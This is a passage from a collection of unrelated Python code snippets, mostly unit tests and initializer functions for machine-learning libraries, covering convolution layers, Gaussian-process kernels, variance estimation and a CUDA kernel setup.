0.002995667)\n self.assertAlmostEqual(_var_covar[1][0], 0.002995667)\n self.assertAlmostEqual(_var_covar[1][1], 8.9787221E-06)", "def initialize_(self, kernel, bias=None):\n dtype = self.body[0].weight.dtype\n device = self.body[0].weight.device\n kernel = torch.tensor(kernel, dtype=dtype, device=device, requires_grad=True)\n assert kernel.shape == self.body[0].weight.shape, 'Wrong kernel shape!'\n if bias is not None:\n bias = torch.tensor(bias, dtype=dtype, device=device, requires_grad=True)\n assert bias.shape == self.body[0].bias.shape, 'Wrong bias shape!'\n self.body[0].weight.data.copy_(kernel)\n self.body[0].bias.data.copy_(bias)", "def test_cvae_init(self):\n torch.manual_seed(0)\n cvae = VAE(\n in_dim=20,\n nb_classes=2,\n latent_dim=16,\n p_dropout=0.1,\n hidden_dims=[64, 32])\n rng = np.random.default_rng(seed=0)\n x = torch.tensor(rng.random(size=(10, 20))).float()\n rng = np.random.default_rng(seed=0)\n y = rng.integers(low=0, high=2, size=10)\n y_onehot = one_hot(y, nb_classes=2)\n y_onehot = torch.tensor(y_onehot).float()\n [x_hat, _, _, _] = cvae(x, y_onehot, 0)\n x_hat_mean = torch.mean(x_hat).detach().numpy()\n self.assertAlmostEqual(x_hat_mean, -0.0245, 4)", "def testInvalidKernelMapper(self):\n\n class DummyKernelMapper(object):\n\n def __init__(self):\n pass\n\n feature = layers.real_valued_column('feature')\n kernel_mappers = {feature: [DummyKernelMapper()]}\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], kernel_mappers=kernel_mappers)", "def testInitializers(self, use_bias):\n\n w_dw = random.random()\n w_pw = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6.\n conv1 = snt.SeparableConv1D(\n output_channels=6,\n channel_multiplier=3,\n kernel_shape=3,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n w_dw, w_pw, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w_dw, conv1.w_pw, conv1.b] if use_bias else\n [conv1.w_dw, conv1.w_pw]).run()\n\n self.assertAllClose(\n conv1.w_dw.eval(), np.full(\n [1, 3, 2, 3], w_dw, dtype=np.float32))\n self.assertAllClose(\n conv1.w_pw.eval(), np.full(\n [1, 1, 6, 6], w_pw, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w_dw' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.SeparableConv1D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w_dw\": tf.ones([])})", "def test_5_scalar_variance_1step(self):\n print(\"test 5 comparing variances\")\n\n means, vars, cl_probs = EM_step(\n self.X_h, self.means_h, self.dispersions_h, self.cluster_probabilities_h\n )\n\n self.assertEqual(means.shape[0], 2)\n\n print(vars[0], vars[1])", "def _WeightInit(self, stddev):\n return init_ops.truncated_normal_initializer(stddev=stddev)", "def test_null_bootstrapping(self):\n\n apply = lambda p, x, i: x[:, :1]\n output = apply(self._params, self._batch.x, self._index)\n # y is zero, hence the loss is just the mean square of the output.\n expected_loss = np.mean(np.square(output))\n\n loss_fn = single_index.L2Loss()\n loss, unused_metrics = loss_fn(\n apply=apply, params=self._params, batch=self._batch, index=self._index)\n self.assertEqual(\n loss, expected_loss,\n (f'expected loss with null bootstrapping is {expected_loss}, '\n f'but it is {loss}'))", "def 
kernel_sigma(n_kernels):\n sigmas = [0.001] # exact match small variance means exact match ?\n if n_kernels == 1:\n return sigmas\n return sigmas + [0.1] * (n_kernels - 1)", "def test_variance(self):\n self.assertEqual(variance(list1, sample=False), np.var(list1))\n self.assertEqual(variance(list1), np.var(list1, ddof=1))", "def testMask1D(self):\n mask = np.ones((3,), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def testInitializers(self, use_bias):\n w = random.random()\n b = np.random.randn(6) # Kernel shape is 3, input channels are 2, 2*3 = 6\n\n conv1 = snt.DepthwiseConv2D(\n channel_multiplier=3,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(), np.full(\n [3, 3, 2, 3], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(conv1.b.eval(), b)\n\n error_msg = \"Initializer for 'w' is not a callable function\"\n with self.assertRaisesRegexp(TypeError, error_msg):\n snt.DepthwiseConv2D(\n channel_multiplier=3,\n kernel_shape=3,\n stride=1,\n use_bias=use_bias,\n initializers={\"w\": tf.ones([])})", "def _initialize_kernel(input_dim: int,\n kernel: str = 'RBF',\n use_single_gp: bool = False) -> GenericKernel:\n if kernel == 'RBF':\n return RBFKernel(input_dim, use_single_gp)\n elif kernel == 'Matern52':\n return Matern52Kernel(input_dim, use_single_gp)\n elif kernel == 'Matern32':\n return Matern32Kernel(input_dim, use_single_gp)\n elif kernel == 'RationalQuadratic':\n return RationalQuadraticKernel(\n input_dim=input_dim, use_single_gp=use_single_gp)\n elif kernel == 'Sigmoid':\n return SigmoidKernel(input_dim, use_single_gp)\n else:\n sys.exit(\"Error: specified Gaussian Process kernel not valid\")", "def eg3(N_train=1000, N_test=500, depend_ratio_train=0.8, depend_ratio_test=0.2, feature_num=10, stable_ratio=0.4):\n\n def eg3_kernel(n, p, stable_ratio=0.4, depend_ratio=0.8):\n p_stable = int(p * stable_ratio)\n p_noise = p - p_stable\n stable_feature = np.random.randn(n, p_stable)\n noise_feature_dependent = np.zeros([n, p_noise])\n noise_feature_independent = np.random.randn(n, p_noise)\n for i in range(p_noise):\n noise_feature_dependent[:, i] = stable_feature[:, i % p_stable] + stable_feature[:,\n (i + 1) % p_stable] + 2 * np.random.randn(\n n) # still need noise\n noise_depend_label = np.random.uniform(0, 1, n).reshape(-1, 1)\n noise_depend_label = np.concatenate([noise_depend_label] * p_noise, axis=1)\n noise_feature = np.where(noise_depend_label < depend_ratio, noise_feature_dependent, noise_feature_independent)\n\n b = np.zeros([p_stable, 1])\n linear_len = int(p_stable / 2)\n\n for i in range(linear_len): # linear part\n b[i, 0] = (-1) ** i * (i % 3 + 1) * p / 3\n for i in range(linear_len, b.shape[0]): # nonlinear part\n b[i, 0] = p / 2\n\n linear_part = np.matmul(stable_feature[:, :linear_len], b[:linear_len, 0])\n nolinear_part = np.zeros([n, 1])\n for i in range(linear_len, b.shape[0]):\n temp = stable_feature[:, 
i % p_stable] * stable_feature[:, (i + 1) % p_stable] * b[i, 0]\n temp = temp.reshape(-1, 1)\n nolinear_part += temp\n\n Y = linear_part.reshape(-1, 1) + nolinear_part + np.random.randn(n, 1)\n\n data = {}\n data['stable'] = stable_feature\n data['noise'] = noise_feature\n data['Y'] = Y\n data['params'] = b\n data['kernel'] = 'eg3'\n return data\n\n data_train = eg3_kernel(n=N_train, p=feature_num, stable_ratio=stable_ratio, depend_ratio=depend_ratio_train)\n data_test = eg3_kernel(n=N_test, p=feature_num, stable_ratio=stable_ratio, depend_ratio=depend_ratio_test)\n return data_train, data_test", "def test_variance_of_stokes_linear_synthetic():\n var_slope = 0.01\n\n nx = 500\n x = np.linspace(0.0, 20.0, nx)\n\n nt = 200\n G = np.linspace(500, 4000, nt)[None]\n c_no_noise = G * np.exp(-0.001 * x[:, None])\n\n c_lin_var_through_zero = stats.norm.rvs(\n loc=c_no_noise,\n # size=y.size,\n scale=(var_slope * c_no_noise) ** 0.5,\n )\n ds = DataStore(\n {\n \"st\": ([\"x\", \"time\"], c_no_noise),\n \"c_lin_var_through_zero\": ([\"x\", \"time\"], c_lin_var_through_zero),\n \"probe1Temperature\": ([\"time\"], range(nt)),\n \"userAcquisitionTimeFW\": ([\"time\"], np.ones(nt)),\n },\n coords={\"x\": x, \"time\": range(nt)},\n attrs={\"isDoubleEnded\": \"0\"},\n )\n\n sections = {\"probe1Temperature\": [slice(0.0, 20.0)]}\n test_st_var, _ = ds.variance_stokes(st_label=\"st\", sections=sections)\n\n # If fit is forced through zero. Only Poisson distributed noise\n (\n slope,\n offset,\n st_sort_mean,\n st_sort_var,\n resid,\n var_fun,\n ) = ds.variance_stokes_linear(\n \"c_lin_var_through_zero\",\n sections=sections,\n nbin=10,\n through_zero=True,\n plot_fit=False,\n )\n assert_almost_equal_verbose(slope, var_slope, decimal=3)\n\n # Fit accounts for Poisson noise plus white noise\n (\n slope,\n offset,\n st_sort_mean,\n st_sort_var,\n resid,\n var_fun,\n ) = ds.variance_stokes_linear(\n \"c_lin_var_through_zero\", sections=sections, nbin=100, through_zero=False\n )\n assert_almost_equal_verbose(slope, var_slope, decimal=3)\n assert_almost_equal_verbose(offset, 0.0, decimal=0)\n\n pass", "def test_init_variants():\n # get data\n X, _, _, _ = get_data()\n # set seed and kernel initialisers for repeatability\n tf.random.set_seed(12345)\n initializer = tf.keras.initializers.Zeros()\n\n # define model architecture\n input_data = Input(shape=X[0].shape)\n xx = Dense(32, activation=\"relu\", kernel_initializer=initializer)(input_data)\n output = Dense(n_classes, activation=\"softmax\", kernel_initializer=initializer)(xx)\n\n # standard way\n model = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model)\n\n # inputs and outputs not in kwargs\n model2 = SafeKerasModel(\n input_data,\n output,\n \"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n )\n check_init_completed(model2)\n\n # batch size zero\n model3 = SafeKerasModel(\n inputs=input_data,\n outputs=output,\n name=\"test\",\n num_samples=X.shape[0],\n epochs=EPOCHS,\n batch_size=0,\n )\n errstr = \"failed to correct batch_size=0 in init\"\n assert model3.batch_size == 32, errstr", "def test_xavier_normal():\n tf.reset_default_graph()\n tf.random.set_random_seed(0)\n xnormal_class = INITIALIZER_REGISTRY['xavier']\n xnormal_obj = xnormal_class({\"uniform\":False})\n tf_init = xnormal_obj.get_entity_initializer(init_type='tf')\n var1 = tf.get_variable(shape=(2000, 100), initializer=tf_init, name=\"var1\")\n with tf.Session() as sess:\n 
sess.run(tf.global_variables_initializer())\n tf_var = sess.run(var1)\n np_var = xnormal_obj.get_entity_initializer(2000, 100, init_type='np')\n # print(np.mean(np_var), np.std(np_var))\n # print(np.mean(tf_var), np.std(tf_var))\n assert(np.round(np.mean(np_var),2)==np.round(np.mean(tf_var),2))\n assert(np.round(np.std(np_var),2)==np.round(np.std(tf_var),2))", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def kernel_test(slabs, data, backend):\n Q = data[:, 0]\n\n layers = []\n for thickness, rsld, isld, sigma in slabs:\n layers.append(\n model.Layer(\n b=(rsld - 1j * isld), dens=0.1, d=thickness, sigma=sigma\n )\n )\n layers.reverse()\n stack = model.Stack(Layers=list(layers[1:-1]), Repetitions=1)\n sample = model.Sample(\n Stacks=[stack], Ambient=layers[-1], Substrate=layers[0]\n )\n # print(sample)\n\n inst = model.Instrument(\n probe=backend,\n wavelength=1.54,\n coords=\"q\",\n I0=1,\n res=0,\n restype=\"no conv\",\n respoints=5,\n resintrange=2,\n beamw=0.1,\n footype=\"no corr\",\n samplelen=10,\n pol=\"uu\",\n )\n if data.shape[1] == 4:\n dQ = data[:, 3]\n inst.restype = \"full conv and varying res.\"\n inst.res = dQ\n if backend == \"neutron pol spin flip\":\n # memory issues in matrix formalism if too many data points\n inst.respoints = 101\n else:\n inst.respoints = (\n 10001 # try to use same convolution as ref1d when generating\n )\n inst.resintrange = 3.5\n\n # print(inst)\n R = sample.SimSpecular(Q, inst)\n\n assert R.shape == data[:, 1].shape\n if data.shape[1] == 4:\n # validation accuracy is reduced for resolution runs, as strongly\n # depends on numerical convolution scheme\n if backend == \"neutron pol spin flip\":\n np.testing.assert_allclose(R, data[:, 1], rtol=0.005)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)", "def test_unroll_kern(self):\r\n # 6 filters is a multiple of 2 and 3. 
Should work.\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=2,\r\n verify_grad=False)\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=3,\r\n verify_grad=False)", "def testZeroInput(self):\n nb.rescale_length(2.0)\n nb.rescale_length(0)\n self.assertEqual(2.0, nb.rscale)", "def test_fit(self):\n X = np.zeros((2, 3), dtype=np.float64)\n snv = SNV(q=50)\n try:\n _ = snv.fit(X)\n except:\n self.assertTrue(False)", "def testShapesNotKnown(self, use_bias):\n\n batch_size = 5\n in_height = in_width = 32\n in_channels = out_channels = 5\n kernel_shape_h = kernel_shape_w = 3\n\n inputs = tf.placeholder(\n tf.float32,\n shape=[None, None, None, in_channels],\n name=\"inputs\")\n\n conv1 = snt.Conv2D(\n name=\"conv1\",\n output_channels=out_channels,\n kernel_shape=[kernel_shape_h, kernel_shape_w],\n padding=snt.SAME,\n stride=1,\n use_bias=use_bias)\n\n output = conv1(inputs)\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n output_eval = output.eval({\n inputs: np.zeros([batch_size, in_height, in_width, in_channels])})\n\n self.assertEqual(\n output_eval.shape,\n (batch_size, in_height, in_width, out_channels))", "def testInitializers(self, use_bias):\n w = random.random()\n b = random.random()\n\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n err = \"Initializer for 'w' is not a callable function or dictionary\"\n with self.assertRaisesRegexp(TypeError, err):\n snt.Conv2D(output_channels=10, kernel_shape=3, stride=1, name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def normc_init(std=1.0, axis=0):\n def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))\n return tf.constant(out)\n return _initializer", "def test_truncate2():\n X = rand(5,5,5)\n T = hosvd(X)\n k = 3\n Tk = T.truncate(k)\n E = X - Tk.asarray()\n Cdk = T.X\n Cdk[:k,:k,:k] = 0\n assert np.allclose(fro_norm(E), fro_norm(Cdk))", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def KernelTest(x, y):\n\n Result = (np.dot(x_test[x, :], x_train[y, :])+1)**5 # Polynomial\n # Result = (np.dot(x_train[x, :], x_train[y, :])+1) # Linear\n # Sum = DotProduct(x, 
y)\n #Sum = 0.0\n #for i in range(2):\n # Sum = Sum + x_train[x, i]*x_train[y, i]\n # Result = (Sum+1)**5\n \"\"\"\n #Gaussian\n sigma = 1\n if np.ndim(x_test[x, :]) == 1 and np.ndim(x_train[y, :]) == 1:\n Result = np.exp(- (np.linalg.norm(x_test[x, :] - x_train[y, :], 2)) ** 2 / (2 * sigma ** 2))\n elif (np.ndim(x_test[x, :]) > 1 and np.ndim(x_train[y, :]) == 1) or (np.ndim(x_test[x, :]) == 1 and np.ndim(x_train[y, :]) > 1):\n Result = np.exp(- (np.linalg.norm(x_test[x, :] - x_train[y, :], 2, axis=1) ** 2) / (2 * sigma ** 2))\n elif np.ndim(x_test[x, :]) > 1 and np.ndim(x_train[y, :]) > 1:\n Result = np.exp(- (np.linalg.norm(x[:, np.newaxis] - y[np.newaxis, :], 2, axis=2) ** 2) / (2 * sigma ** 2))\n \"\"\"\n return Result", "def init_vector(self,x,dim):\n if dim == \"noise\":\n self.prior.sqrtM.init_vector(x,1)\n else:\n self.prior.init_vector(x,dim)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def testInitializers(self, use_bias):\n\n w = random.random()\n b = random.random()\n conv1 = snt.Conv3D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 3, 3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n with self.assertRaises(TypeError):\n snt.Conv3D(output_channels=10, kernel_shape=3, stride=1, name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def testShapesNotKnown(self, use_bias):\n\n batch_size = 5\n in_length = 32\n in_channels = out_channels = 5\n kernel_shape = 3\n\n inputs = tf.placeholder(\n tf.float32,\n shape=[None, None, in_channels],\n name=\"inputs\")\n\n conv1 = snt.Conv1D(\n name=\"conv1\",\n output_channels=out_channels,\n kernel_shape=kernel_shape,\n padding=snt.SAME,\n stride=1,\n use_bias=use_bias)\n\n output = conv1(inputs)\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n output_eval = output.eval({\n inputs: np.zeros([batch_size, in_length, in_channels])})\n\n self.assertEqual(\n output_eval.shape,\n (batch_size, in_length, out_channels))", "def test_graphical_lasso_cov_init_deprecation():\n rng, dim, n_samples = np.random.RandomState(0), 20, 100\n prec = make_sparse_spd_matrix(dim, alpha=0.95, random_state=0)\n cov = linalg.inv(prec)\n X = rng.multivariate_normal(np.zeros(dim), cov, size=n_samples)\n\n emp_cov = empirical_covariance(X)\n with pytest.warns(FutureWarning, match=\"cov_init parameter is deprecated\"):\n graphical_lasso(emp_cov, alpha=0.1, cov_init=emp_cov)", "def testMask2D(self):\n mask = np.ones((3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 2))\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = np.reshape(np.array([6, 6, 6]), (1, 3, 1))\n with self.test_session():\n 
tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def test_matern_zero_lengthscale(matern):\n with pytest.raises(ValueError) as exp:\n matern(lengthscale=0.0, variance=1.0, output_dim=1)\n assert exp.value.args[0].find(\"lengthscale must be positive.\") >= 0", "def Kernel(x, y):\n\n Result = (np.dot(x_train[x, :], x_train[y, :])+1)**5 # Polynomial\n #Result = (np.dot(x_train[x, :], x_train[y, :])+1) # Linear\n #Gaussian\n \"\"\"\n sigma = 1\n if np.ndim(x_train[x, :]) == 1 and np.ndim(x_train[y, :]) == 1:\n Result = np.exp(- (np.linalg.norm(x_train[x, :] - x_train[y, :], 2)) ** 2 / (2 * sigma ** 2))\n elif (np.ndim(x_train[x, :]) > 1 and np.ndim(x_train[y, :]) == 1) or (np.ndim(x_train[x, :]) == 1 and np.ndim(x_train[y, :]) > 1):\n Result = np.exp(- (np.linalg.norm(x_train[x, :] - x_train[y, :], 2, axis=1) ** 2) / (2 * sigma ** 2))\n elif np.ndim(x_train[x, :]) > 1 and np.ndim(x_train[y, :]) > 1:\n Result = np.exp(- (np.linalg.norm(x[:, np.newaxis] - y[np.newaxis, :], 2, axis=2) ** 2) / (2 * sigma ** 2))\n \"\"\"\n return Result", "def test__get_conv_raise_dimension_error(N):\n with pytest.raises(ValueError):\n utils._get_conv(N)", "def init_Ks(self, kernels, noise):\n\n self.kernels = kernels\n self.noise = np.array([noise])\n self.construct_Ks()", "def test_fit_default_distribution(self):\n\n copula = GaussianMultivariate(GaussianUnivariate)\n copula.fit(self.data)\n\n for i, key in enumerate(self.data.columns):\n assert copula.columns[i] == key\n assert copula.univariates[i].__class__ == GaussianUnivariate\n assert copula.univariates[i]._params['loc'] == self.data[key].mean()\n assert copula.univariates[i]._params['scale'] == np.std(self.data[key])\n\n expected_covariance = copula._get_covariance(self.data)\n assert (copula.covariance == expected_covariance).all().all()", "def test_nu_large_recovers_rbf_kernel(x0: np.ndarray, x1: np.ndarray, input_dim: int):\n lengthscale = 1.25\n kernmat_rbf = kernels.ExpQuad(lengthscale=lengthscale, input_dim=input_dim)\n kernmat_matern = kernels.Matern(lengthscale=lengthscale, nu=15, input_dim=input_dim)\n np.testing.assert_allclose(\n kernmat_rbf(x0, x1),\n kernmat_matern(x0, x1),\n err_msg=\"RBF and Matern kernel are not equivalent for nu=infty.\",\n rtol=0.05,\n atol=0.01,\n )", "def test_zero(self):\n controller = LinearController(self.G, 2, mode='zero')\n sim = simulation.Simulation(self.G, controller, dt=self.dt)\n sim.run(self.dt)\n\n self.assertAlmostEqual(np.linalg.norm(controller.W.ravel()), 0.0)\n self.assertAlmostEqual(np.linalg.norm(controller.out), 0.0)", "def __init__(self, variance):\n self.variance = variance", "def test_init(self):\n likelihoods.Gaussian()\n self._standard_likelihood()", "def __init__(self, sigma_initializer=RandomNormal(0, 1), spectral_iterations=1,\n fully_diff_spectral=True, stateful=False, renormalize=False, **kwargs):\n super(SNConditionalConv2D, self).__init__(**kwargs)\n self.sigma_initializer = keras.initializers.get(sigma_initializer)\n self.fully_diff_spectral = fully_diff_spectral\n self.spectral_iterations = spectral_iterations\n self.stateful = stateful\n self.renormalize = renormalize", "def kernel_test(l, v):\n\t\"Testing RBF and Matern kernels with: \"\n\tx = np.array([1,2,3,4])\n\ty = np.array([2,4,6])\n\tprint(x)\n\tprint(y)\n\tprint(\"RBF Kernel with l= \" + str(l) + \": \")\n\tprint(rbf_kernel(x,y,l))\n\tprint(\"Matern Kernel with l= \" + str(l) + \" and v= \" + str(v) + \": \")\n\tprint(matern_kernel(x,y,l, v))", "def test_ndim(self):\r\n # 'ndim' is an 
optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def normc_initializer(std=1.0):\n def _initializer(shape, dtype=None, partition_info=None): #pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n return tf.constant(out)\n return _initializer", "def fixed(input_dim, K, variance=1.):\r\n part = parts.fixed.Fixed(input_dim, K, variance)\r\n return kern(input_dim, [part])", "def test_estimate_parameters():\n # a red image\n image = numpy.zeros((3, 11, 11))\n image[0, :, :] = 255\n skin_filter.estimate_gaussian_parameters(image)\n assert (skin_filter.mean == [1.0, 0.0]).all(), \"mean for a red image is not OK\"\n assert (skin_filter.covariance == [[0.0, 0.0], [0.0, 0.0]]).all(), \"covariance for red image is not OK\"\n\n # a green image\n image = numpy.zeros((3, 11, 11))\n image[1, :, :] = 255\n skin_filter.estimate_gaussian_parameters(image)\n assert (skin_filter.mean == [0.0, 1.0]).all(), \"mean for a green image is not OK\"\n assert (skin_filter.covariance == [[0.0, 0.0], [0.0, 0.0]]).all(), \"covariance for green image is not OK\"", "def testInitializers(self, use_bias):\n w = random.random()\n b = random.random()\n\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n use_bias=use_bias,\n name=\"conv1\",\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n err = \"Initializer for 'w' is not a callable function or dictionary\"\n with self.assertRaisesRegexp(TypeError, err):\n snt.Conv1D(output_channels=10,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n use_bias=use_bias,\n name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def bias(input_dim, variance=1.):\r\n part = parts.bias.Bias(input_dim, variance)\r\n return kern(input_dim, [part])", "def initiategaussian(sd, x0):\n y = np.exp(-x**2/(2*sd**2))\n return y", "def testInputTypeError(self, use_bias):\n conv1 = snt.Conv2D(output_channels=1,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(\n 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def test_predict_uncertain_inputs(self):\n X = np.linspace(-5,5, 10)[:, None]\n Y = 2*X + np.random.randn(*X.shape)*1e-3\n m = GPy.models.BayesianGPLVM(Y, 1, X=X, kernel=GPy.kern.Linear(1), num_inducing=1)\n m.Gaussian_noise[:] = 1e-4\n m.X.mean[:] = X[:]\n m.X.variance[:] = 1e-5\n m.X.fix()\n m.optimize()\n 
X_pred_mu = np.random.randn(5, 1)\n X_pred_var = np.random.rand(5, 1) + 1e-5\n from GPy.core.parameterization.variational import NormalPosterior\n X_pred = NormalPosterior(X_pred_mu, X_pred_var)\n # mu = \\int f(x)q(x|mu,S) dx = \\int 2x.q(x|mu,S) dx = 2.mu\n # S = \\int (f(x) - m)^2q(x|mu,S) dx = \\int f(x)^2 q(x) dx - mu**2 = 4(mu^2 + S) - (2.mu)^2 = 4S\n Y_mu_true = 2*X_pred_mu\n Y_var_true = 4*X_pred_var\n Y_mu_pred, Y_var_pred = m.predict_noiseless(X_pred)\n np.testing.assert_allclose(Y_mu_true, Y_mu_pred, rtol=1e-3)\n np.testing.assert_allclose(Y_var_true, Y_var_pred, rtol=1e-3)", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def init():\n\tN = np.int32(DIM) #prepare for stitching\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN)/DIM\n\tHII_scale = np.float32(BOX_LEN)/HII_DIM\n\tshape = (N,N,N)\n\t\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=0)\n\n\tkernel_source = open(cmd_folder+\"/initialize.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'VOLUME': VOLUME,\n\t\t'DIM': DIM\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_kernel = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tadj_complex_conj = 